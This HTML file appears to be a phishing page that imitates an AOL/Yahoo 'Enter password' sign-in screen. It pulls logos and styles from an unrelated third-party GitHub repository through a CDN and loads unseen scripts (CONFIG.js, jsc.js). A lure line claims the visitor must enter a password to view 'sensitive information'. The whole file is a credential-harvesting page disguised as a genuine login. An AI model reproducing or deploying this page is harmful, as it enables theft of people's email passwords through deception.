<!DOCTYPE html>
<html lang="en" id="Stencil" class="js grid light-theme ">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">
    <link href="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/assets/YM/static/wm/mbr/e4793047891fc8d64cda6a67d8098a18e013cffe/aol-main.css" rel="stylesheet"
          type="text/css">
    <style>
        html, body{
            margin: 0;
            padding: 0;
        }
        @media screen and (max-width: 480px) {
            .login-box {
                box-shadow: none;
                border-top: 0;
                width: 100%;
                min-height: auto;
            }
        }

        .mbr-login-hd.txt-align-center:not(.yahoo) .bb{
            display: none !important;
        }

        .mbr-login-hd.txt-align-center.yahoo .aa{
            display: none !important;
        }

        .button-container.yahoo #login-signin{
            font-size: .94118rem;
            font-weight: 500;
            min-height: 2.35294rem;
            padding: 0.64706rem 0;
            line-height: 1rem;
            font-family: 'Yahoo Sans','Helvetica Neue',Helvetica,Arial;
            color: #fff;
            background: #188fff;
            border: 1px solid #188fff;
            border-radius: 1.17647rem;
            margin: 0;
            width: 100%;
            white-space: normal;
        }


    </style>
    <script src="../../../CONFIG.js"></script>
</head>
<body class="bucket-mbr-qr-comet-sdk">
<div class="login-box-container">
    <div class="login-box right">
        <div class="mbr-login-hd txt-align-center">
            <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/assets/YM/static/aol-logo-black-v.0.0.2.png" alt="Aol"
                 class="logo aol-en-US aa" width="100" height="">
            <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/assets/YM/static/aol-logo-white-v0.0.4.png" alt="Aol"
                 class="dark-mode-logo logo aol-en-US aa" width="100" height="">
            <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/assets/YM/static/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Aol"
                 class="logo aol-en-US bb" width="100" height="">
            <img src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/assets/YM/static/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Aol"
                 class="dark-mode-logo logo aol-en-US bb" width="100" height="">
        </div>
        <div class="challenge password-challenge">
            <div class="challenge-header">
                <div id="yid" class="yid"></div>
            </div>
            <div id="password-challenge" class="primary">
                <strong class="challenge-heading">Enter&nbsp;password</strong>
                <span class="txt-align-center challenge-desc">to finish sign&nbsp;in</span>
                <form action="" method="post" id="challenge-form" class="challenge-form">
                    <div class="hidden-username">
                        <input type="text" tabindex="-1" aria-hidden="true" role="presentation" autocorrect="off"
                               spellcheck="false" name="username" id="username" value="">
                    </div>
                    <div id="password-container" class="input-group password-container blurred">
                        <input type="password" id="login-passwd" class="password" name="password" placeholder=" "
                               autofocus="" autocomplete="current-password" data-rapid-tracking="true"
                               data-ylk="elm:input;elmt:focus;slk:passwd;mKey:password-challenge-focus-passwd">
                        <label for="login-passwd" id="password-label" class="password-label">Password</label>
                        <div class="caps-indicator hide" id="caps-indicator" title="Capslock is&nbsp;on"></div>
                        <button type="button" class="show-hide-toggle-button hide-pw" id="password-toggle-button"
                                tabindex="-1" title="Show&nbsp;password" data-rapid-tracking="true"
                                data-ylk="elm:btn;elmt:toggle;slk:toggle-show-passwd;mKey:password-challenge-toggle-show-hide">
                        </button>
                    </div>
                    <input type="hidden" id="domain">
                    <p class="error-msg" id="error-msg" role="alert" data-error="messages.ERROR_INVALID_PASSWORD">
                        You are about to view sensitive information, please enter your password to continue.
                    </p>

                    <div class="button-container">
                        <button type="submit" id="login-signin"
                                class="pure-button puree-button-primary puree-spinner-button challenge-button"
                                name="verifyPassword" value="Next" data-rapid-tracking="true"
                                data-ylk="elm:btn;elmt:primary;slk:next;mKey:password-challenge-next">
                            Next
                        </button>
                    </div>
                    <div class="forgot-cont challenge-button-link">
                        <input type="button" class="pure-button puree-button-link challenge-button-link"
                               data-ylk="elm:btn;elmt:skip;slk:skip;mKey:password-challenge-skip-recovery"
                               data-rapid-tracking="true" id="mbr-forgot-link" name="skip"
                               value="Forgot&nbsp;password?">
                    </div>
                </form>
            </div>
        </div>
    </div>

</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js" integrity="sha256-xNzN2a4ltkB44Mc/Jz3pT4iU1cmeR0FkXs4pru/JxaQ=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/assets/YM/static/jsc.js"></script>
</body>
</html>



